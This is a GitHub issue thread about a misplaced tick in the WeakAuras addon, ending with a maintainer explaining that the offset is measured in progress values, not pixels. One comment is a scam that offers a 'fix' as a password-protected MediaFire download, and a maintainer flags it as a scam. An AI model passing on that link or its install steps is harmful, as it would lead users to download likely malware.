### ISSUE TITLE
Tick Offset from progress faulty placement

### ISSUE THREAD

**Issue by LootFever** [WeakAuras/WeakAuras2#5370]
### Is there an existing issue for this?

- [X] I have searched the existing open and closed issues.

### Description

There seems to be some fault going on when using the tick mode "Offset from progress".

With the following settings:
![image](https://github.com/user-attachments/assets/364d5b29-4756-437d-8dc5-d152050a63e3)

the tick is displayed like this:
![image](https://github.com/user-attachments/assets/ff4ba1e3-deef-46e5-a4c8-5937c3dccd6c)
![image](https://github.com/user-attachments/assets/08f50fb3-f90a-473f-bc65-8971aacfe6aa)

So far it's fine and from that behaviour I understand that the tick counts it's center for the offset.
Which would mean if I set the offset to 25 it should be at the end (+/- 1px).

But doing that it shows up like this
![image](https://github.com/user-attachments/assets/1590e5eb-7097-49a5-ada3-33a7f4de8bf7)

To fix it manually I have to use 12.5 (quarterof Thickness) as offset
![image](https://github.com/user-attachments/assets/70216a9a-e370-4868-b55b-a39ad5b68000)

It doesn't make sense to me why it would use the quarter to place the tick.
Either I'm in the wrong here and are missing sth simple or there might be a /2 or *2 to much in there.

### WeakAuras Version

5.17.0

### World of Warcraft Flavor

Retail (Default)

### World of Warcraft Region

EU

### Tested with only WeakAuras

I got this issue with only WeakAuras enabled

### Lua Error

```Text
no error
```

### Reproduction Steps

1. Make a progress bar
2. add a tick
3. set tick to Offset from progress value

### Last Good Version

don't know

### Screenshots

in the description

### Export String

```Text
!WA:2!1zvqVTTXsyjluKcH0xSvAdA8ZOqnO9HMhscAnAstcqGJLICKnCKeOKJDmca1kYvIBdf3n7Uu2k3QrrHpRlf5Yl5j8oM3f9(b8A9FGsiKl9wGAp0EvO3tNDxkl7MyDGAMHZm7SZ8nZWKRKPDg3mU7FJ9ODWCFuxX8RvCPF(Pp9hsKizXL(X5MlBIeZauVATc3orIe9jo0GQ0qUdEHedrHspkVmtsObI0dqUFDOqIDVhA3zMYqcMH3TCZMcS80GoboGjvOKazJ8fkvRG1abdXFurmPLN8w9AG45P(u(IRLco0zNfo(efxkYqKAOwxlQePoYKS5og)9OU4ClVrTY5urP3EsoPvlmx83(h8yY9NL9(HcSnh)4qchxHUdMxRldxpNeEMlmGizzukGAiO8gfXiFLtRpse2a3bhiRg2Sjz3b25xUAn7Q1w2Qw0zBWG8gMpAQDABoqXl8O7KNkKt9qfog8Gv1kfwF9EkvC8rcHxpMkwurX7SNGH99x1vKEp17vbvDRauBSiTL2fw64EO6LhAv9(U4gqWPUn8IfwVYkBaUpi(ENMnhYrs6GRz4vb4lmftBhv6ETuWVXqrbZdq(3hsAq(87hX40wCSqyQ43Cbak0tG9BQRFlwRCL9MuVERLliMeizihjXEJWbOg(47YrUe4o4DGU0zWfpizFi9yHBPWrBFUOmdb2giNh1ItddCJf0KYXgbDIY0tPbL7c5bZF2gK1IqaniwIG8eCQdIzmxZKjtMAuSKoebbIO6tuh72cZMR6JdrCC2vc99ZUPhrIN4FQoutT)8SpwI3vARFaXuBK0MzljTHQbh7quzUu9ouLl8Pm2SAoHhYvHgIJJKJmsNKoJEp2z1sGUkk4uIZMexPxULb2XMdJSl2vl8ByFYjfd(4wiNU2n9PuU3bAfunIKMDJE3(CvNcUgimxPYLkm0KZEGPkKKDXtYPUDb8hXXw6bObpQVB3OmCOcOuLL9KSQn11wv7R3x)YPaTEXkhihvPw2QOar2sioNUdlZrYuBzcRuhtyCSUqc2hDshRHl5q9R2bkEBYrS92mMWKsMu7JlnhzQ0bRwQublBZSPHhgO6(QYBuB9vlvGD(34OdIjYfqdWtTQkGapFCwERjz5Z)wcCdHLk(D3FUHqX)r28jJ5oqZUBS9J1ChPZAGAqGYDHCShGHuVggj5GBd9zQIaEW9r(HyJ9gNfRo7Zwv1Y3eu(H5rakjOvoe)HBS6LNYD5QQg1bAZ8XbTKE3A8XNliM)FEPeZeJia1gF8qqm)fw8QSzpewh7L6JmrIh8ma8fUVM3GskU0p9SN9)F9RFDXL(TRF966Pkd71756Ts)YL(FVcKyUjtQKMdfOcC135fx(o3Xe0Tja0s1lOyI3eLSHNEHZCdJZeMBYIRx9E58Pi3o6rZbW4wU3i9eAaJ4AdtMDoNv7qFj5A)XzQ)RNP(lpt9gseCQYZf1nDoTcaHzlYXn0ZsZB0dagkIr6PG5urTAMCemRamC54DN6vPE8jv(JoYClyKPItpo4dm05pSbJD2wXZzlZvp14O(flBT62LlvB51)RNcjWRpxp(vJZraWcMJATJY5F7Ph0KdBFQkb0gkvp9sdbXfBzT6DlwB80505JlDVyHfUTUI9Me)U(llsCbIl7VR3IbaSS38MzlgQWHkQvOoHIbXFnIJpH5XJlrJ2Ke4wJs9fzxXhjhp5lwQzE98r9Y9ekTDslDYWRVK60XSi7dt(Fhe)zgexxCGvPc3VGLjDgBDutlKpZdLASPBDf1vwLmAunVvHcL6HciT1PXRzjKiUCLOmrBFagjujgnG(udDvnKGk2QnYCbgYuUI9u6O8u025AJibAdJE2PIEE0)oQF02nAscicV3qmyCtsR0CsG6wG9wmK4o4lf3y3k(34IxnFUb0PL2OVRV6SiXFigjWmpb4sZvl(bPxl6FLohCsY0r)N0zenU6v(IV6kFEMoVCR)8
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by InfusOnWoW** [comment]
There was a scam attempt, which I've since deleted. Please do not download the linked file

**Comment by InfusOnWoW** [comment]
The offset is not in pixels but in progress values. Since your progress bar is 200px wide, that's where the additional 2x comes from.
